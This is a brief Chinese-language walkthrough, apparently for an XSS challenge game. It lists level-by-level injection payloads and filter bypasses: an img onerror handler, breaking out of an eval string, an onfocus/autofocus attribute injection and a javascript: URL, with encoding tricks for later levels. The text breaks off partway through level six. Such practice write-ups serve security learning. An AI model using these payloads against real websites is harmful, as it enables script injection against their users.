目录
1.第一关:
因为innerHTML自动限制<script>标签,使用<img>标签
<img%20src="1"%20οnerrοr="alert(1337)">
2.第二关:
出现innerText,使用闭合
eval(`ma = "Ma name aaa";alert(1337);""`)
3.第三关:
过滤了<>号;使用input表单自带属性,onfocus获取焦点和autofocus自动对焦。
wey=aaaaaaaaaaaa" οnfοcus=alert(1337) autofocus="
4.第四关:
form表单中出现问题 cation中出现伪协议
javascript:alert(1337)
5.第五关:
过滤了符号,使用<img>标签
括号被过滤不能触发了,
对括号进行编码,还是不行出现%28%29,使用location
使用location进行变成字符串在进行编码:
6.第六关:
过滤了字母,使用编码的方式绕过;
先进行编码: